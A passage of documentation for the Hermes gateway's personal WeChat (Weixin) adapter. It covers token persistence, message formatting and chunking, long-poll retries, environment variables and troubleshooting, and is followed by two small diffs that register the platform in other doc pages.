The iLink Bot API requires a `context_token` to be echoed back with each outbound message for a given peer. The adapter maintains a disk-backed context token store:
- Tokens are saved per account+peer to `~/.hermes/weixin/accounts/<account_id>.context-tokens.json`
- On startup, previously saved tokens are restored
- Every inbound message updates the stored token for that sender
- Outbound messages automatically include the latest context token
This ensures reply continuity even after gateway restarts.
## Markdown Formatting
WeChat's personal chat does not natively render full Markdown. The adapter reformats content for better readability:
- **Headers** (`# Title`) → converted to `【Title】` (level 1) or `**Title**` (level 2+)
- **Tables** → reformatted as labeled key-value lists (e.g., `- Column: Value`)
- **Code fences** → preserved as-is (WeChat renders these adequately)
- **Excessive blank lines** → collapsed to double newlines
## Message Chunking
Long messages are split intelligently for chat delivery:
- Maximum message length: **4000 characters**
- Split points prefer paragraph boundaries and blank lines
- Code fences are kept intact (never split mid-block)
- Indented continuation lines (sub-items in reformatted tables/lists) stay with their parent
- Oversized individual blocks fall back to the base adapter's truncation logic
## Typing Indicators
The adapter shows typing status in the WeChat client:
1. When a message arrives, the adapter fetches a `typing_ticket` via the `getconfig` API
2. Typing tickets are cached for 10 minutes per user
3. `send_typing` sends a typing-start signal; `stop_typing` sends a typing-stop signal
4. The gateway automatically triggers typing indicators while the agent processes a message
## Long-Poll Connection
The adapter uses HTTP long-polling (not WebSocket) to receive messages:
### How It Works
1. **Connect:** Validates credentials and starts the poll loop
2. **Poll:** Calls `getupdates` with a 35-second timeout; the server holds the request until messages arrive or the timeout expires
3. **Dispatch:** Inbound messages are dispatched concurrently via `asyncio.create_task`
4. **Sync buffer:** A persistent sync cursor (`get_updates_buf`) is saved to disk so the adapter resumes from the correct position after restarts
### Retry Behavior
On API errors, the adapter uses a simple retry strategy:
| Condition | Behavior |
|-----------|----------|
| Transient error (1st2nd) | Retry after 2 seconds |
| Repeated errors (3+) | Back off for 30 seconds, then reset counter |
| Session expired (`errcode=-14`) | Pause for 10 minutes (re-login may be needed) |
| Timeout | Immediately re-poll (normal long-poll behavior) |
### Deduplication
Inbound messages are deduplicated using message IDs with a 5-minute window. This prevents double-processing during network hiccups or overlapping poll responses.
### Token Lock
Only one Weixin gateway instance can use a given token at a time. The adapter acquires a scoped lock on startup and releases it on shutdown. If another gateway is already using the same token, startup fails with an informative error message.
## All Environment Variables
| Variable | Required | Default | Description |
|----------|----------|---------|-------------|
| `WEIXIN_ACCOUNT_ID` | ✅ | — | iLink Bot account ID (from QR login) |
| `WEIXIN_TOKEN` | ✅ | — | iLink Bot token (auto-saved from QR login) |
| `WEIXIN_BASE_URL` | — | `https://ilinkai.weixin.qq.com` | iLink API base URL |
| `WEIXIN_CDN_BASE_URL` | — | `https://novac2c.cdn.weixin.qq.com/c2c` | CDN base URL for media transfer |
| `WEIXIN_DM_POLICY` | — | `open` | DM access policy: `open`, `allowlist`, `disabled`, `pairing` |
| `WEIXIN_GROUP_POLICY` | — | `disabled` | Group access policy: `open`, `allowlist`, `disabled` |
| `WEIXIN_ALLOWED_USERS` | — | _(empty)_ | Comma-separated user IDs for DM allowlist |
| `WEIXIN_GROUP_ALLOWED_USERS` | — | _(empty)_ | Comma-separated group IDs for group allowlist |
| `WEIXIN_HOME_CHANNEL` | — | — | Chat ID for cron/notification output |
| `WEIXIN_HOME_CHANNEL_NAME` | — | `Home` | Display name for the home channel |
| `WEIXIN_ALLOW_ALL_USERS` | — | — | Gateway-level flag to allow all users (used by setup wizard) |
## Troubleshooting
| Problem | Fix |
|---------|-----|
| `Weixin startup failed: aiohttp and cryptography are required` | Install both: `pip install aiohttp cryptography` |
| `Weixin startup failed: WEIXIN_TOKEN is required` | Run `hermes gateway setup` to complete QR login, or set `WEIXIN_TOKEN` manually |
| `Weixin startup failed: WEIXIN_ACCOUNT_ID is required` | Set `WEIXIN_ACCOUNT_ID` in your `.env` or run `hermes gateway setup` |
| `Another local Hermes gateway is already using this Weixin token` | Stop the other gateway instance first — only one poller per token is allowed |
| Session expired (`errcode=-14`) | Your login session has expired. Re-run `hermes gateway setup` to scan a new QR code |
| QR code expired during setup | The QR auto-refreshes up to 3 times. If it keeps expiring, check your network connection |
| Bot doesn't respond to DMs | Check `WEIXIN_DM_POLICY` — if set to `allowlist`, the sender must be in `WEIXIN_ALLOWED_USERS` |
| Bot ignores group messages | Group policy defaults to `disabled`. Set `WEIXIN_GROUP_POLICY=open` or `allowlist` |
| Media download/upload fails | Ensure `cryptography` is installed. Check network access to `novac2c.cdn.weixin.qq.com` |
| `Blocked unsafe URL (SSRF protection)` | The outbound media URL points to a private/internal address. Only public URLs are allowed |
| Voice messages show as text | If WeChat provides a transcription, the adapter uses the text. This is expected behavior |
| Messages appear duplicated | The adapter deduplicates by message ID. If you see duplicates, check if multiple gateway instances are running |
| `iLink POST ... HTTP 4xx/5xx` | API error from the iLink service. Check your token validity and network connectivity |
| Terminal QR code doesn't render | Install `qrcode`: `pip install qrcode`. Alternatively, open the URL printed above the QR |
+1
View File
@@ -44,6 +44,7 @@ Each session is tagged with its source platform:
| `dingtalk` | DingTalk messenger |
| `feishu` | Feishu/Lark messenger |
| `wecom` | WeCom (WeChat Work) |
| `weixin` | Weixin (personal WeChat) |
| `bluebubbles` | Apple iMessage via BlueBubbles macOS server |
| `homeassistant` | Home Assistant conversation |
| `webhook` | Incoming webhooks |
+1
View File
@@ -108,6 +108,7 @@ const sidebars: SidebarsConfig = {
'user-guide/messaging/dingtalk',
'user-guide/messaging/feishu',
'user-guide/messaging/wecom',
'user-guide/messaging/weixin',
'user-guide/messaging/bluebubbles',
'user-guide/messaging/open-webui',
'user-guide/messaging/webhooks',